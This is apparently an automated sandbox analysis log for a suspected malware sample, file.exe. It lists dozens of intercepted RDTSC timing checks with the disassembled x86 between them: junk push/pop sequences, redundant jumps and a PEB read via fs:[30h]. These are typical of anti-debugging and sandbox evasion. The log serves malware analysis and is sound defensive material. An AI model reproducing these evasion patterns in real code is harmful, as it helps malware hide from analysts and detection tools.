Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BC39 second address: D5BC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BF0B second address: D5BF0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BF0F second address: D5BF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jc 00007FC3313C0922h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F4D7 second address: D5F4DC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EAE7 second address: D5EAF1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3313C0916h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EAF1 second address: D5EAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EAF7 second address: D5EB01 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC3313C0922h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EB01 second address: D5EB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC330B7B0F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FC330B7B104h 0x00000014 pop edx 0x00000015 jmp 00007FC330B7B0FDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EB32 second address: D5EB3D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FC3313C0916h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5ECA2 second address: D5ECBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B109h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EE4D second address: D5EE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC3313C091Ch 0x0000000b jmp 00007FC3313C0923h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F1A8 second address: D5F1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FC330B7B0F8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F1B5 second address: D5F1C1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC3313C091Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D674A1 second address: D674C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B0FFh 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FC330B7B0FEh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6546A second address: D6546F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65624 second address: D65635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007FC330B7B0F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65635 second address: D65673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC3313C092Dh 0x0000000e jmp 00007FC3313C0927h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC3313C0927h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65673 second address: D65679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65679 second address: D6568A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3313C091Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCE375 second address: CCE37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65A9B second address: D65A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65A9F second address: D65AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65AA3 second address: D65AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007FC3313C0922h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65AC2 second address: D65AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC330B7B105h 0x0000000b jne 00007FC330B7B0F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D65DD1 second address: D65DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC3313C0916h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC3313C091Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6FC7C second address: D6FC88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC330B7B0F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6FC88 second address: D6FC9E instructions: 0x00000000 rdtsc 0x00000002 js 00007FC3313C091Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC3313C0916h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6FC9E second address: D6FCA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6FF9C second address: D6FFA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D700ED second address: D70115 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC330B7B0FAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC330B7B107h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70115 second address: D7012D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC3313C0916h 0x00000008 jmp 00007FC3313C091Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7028E second address: D70292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70292 second address: D7029F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC3313C0916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB86FA second address: CB8701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8701 second address: CB8707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7824E second address: D78254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78254 second address: D7826F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b jmp 00007FC3313C0920h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78535 second address: D78539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D786B5 second address: D786D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3313C0928h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7894B second address: D78951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78951 second address: D78955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78955 second address: D78960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78960 second address: D78987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3313C091Dh 0x00000010 jmp 00007FC3313C091Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D34E second address: D8D376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B109h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jo 00007FC330B7B0FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D376 second address: D8D37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0B9F second address: CC0BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0BA5 second address: CC0BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C0924h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CEAA second address: D8CED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC330B7B0FBh 0x0000000c jmp 00007FC330B7B106h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0B60 second address: CC0B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3313C091Ch 0x00000012 jmp 00007FC3313C0926h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D02C second address: D8D046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC330B7B101h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D905F1 second address: D905F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D98287 second address: D9828D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9828D second address: D98298 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9BEBF second address: D9BECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC330B7B0F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA0AA1 second address: DA0AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA0AA7 second address: DA0AB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jl 00007FC330B7B0F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA0AB8 second address: DA0AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FC3313C0927h 0x0000000c pushad 0x0000000d jo 00007FC3313C0916h 0x00000013 jmp 00007FC3313C0925h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC4274 second address: CC427C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2AA6 second address: DA2AD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 jmp 00007FC3313C0926h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007FC3313C091Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2AD9 second address: DA2AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FC330B7B0F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e jmp 00007FC330B7B0FBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA69B6 second address: DA69BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB527 second address: DAB52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB52B second address: DAB53A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAC00B second address: DAC027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC330B7B0F6h 0x0000000a jmp 00007FC330B7B102h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0616 second address: DB061B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB061B second address: DB0621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0621 second address: DB0630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FC3313C091Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6FE6 second address: DE7002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B108h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE7002 second address: DE701C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3313C091Fh 0x00000008 jnl 00007FC3313C0916h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF3AE5 second address: DF3AE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF3AE9 second address: DF3AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FC3313C0916h 0x0000000e jl 00007FC3313C0916h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E009D4 second address: E009E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC330B7B0FEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6705 second address: EC670B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC684F second address: EC6857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6857 second address: EC6861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6861 second address: EC688B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 jnl 00007FC330B7B128h 0x0000000e push edx 0x0000000f jmp 00007FC330B7B104h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC688B second address: EC6895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC3313C0916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6A3A second address: EC6A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6A3F second address: EC6A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6A45 second address: EC6A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6CD1 second address: EC6CFB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3313C091Ch 0x00000008 jmp 00007FC3313C0926h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6CFB second address: EC6D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6FF7 second address: EC700E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0923h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC700E second address: EC7018 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7018 second address: EC701C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB90A second address: ECB90E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB90E second address: ECB967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or edx, 31E32D00h 0x0000000e or dword ptr [ebp+122D291Dh], esi 0x00000014 push dword ptr [ebp+122D283Bh] 0x0000001a sub dx, 3F1Fh 0x0000001f call 00007FC3313C0919h 0x00000024 pushad 0x00000025 jmp 00007FC3313C091Bh 0x0000002a push ecx 0x0000002b jng 00007FC3313C0916h 0x00000031 pop ecx 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jnp 00007FC3313C0929h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB967 second address: ECB97E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB97E second address: ECB982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB982 second address: ECB9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC330B7B107h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC330B7B107h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB9BB second address: ECB9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECB9C0 second address: ECB9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B0FCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD2B5 second address: ECD2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD2BA second address: ECD2C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD2C4 second address: ECD2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD2C8 second address: ECD2D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719007B second address: 7190081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190081 second address: 71900C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f jmp 00007FC330B7B100h 0x00000014 sub esp, 18h 0x00000017 jmp 00007FC330B7B100h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 mov dx, 9D7Eh 0x00000026 popad 0x00000027 rdtsc
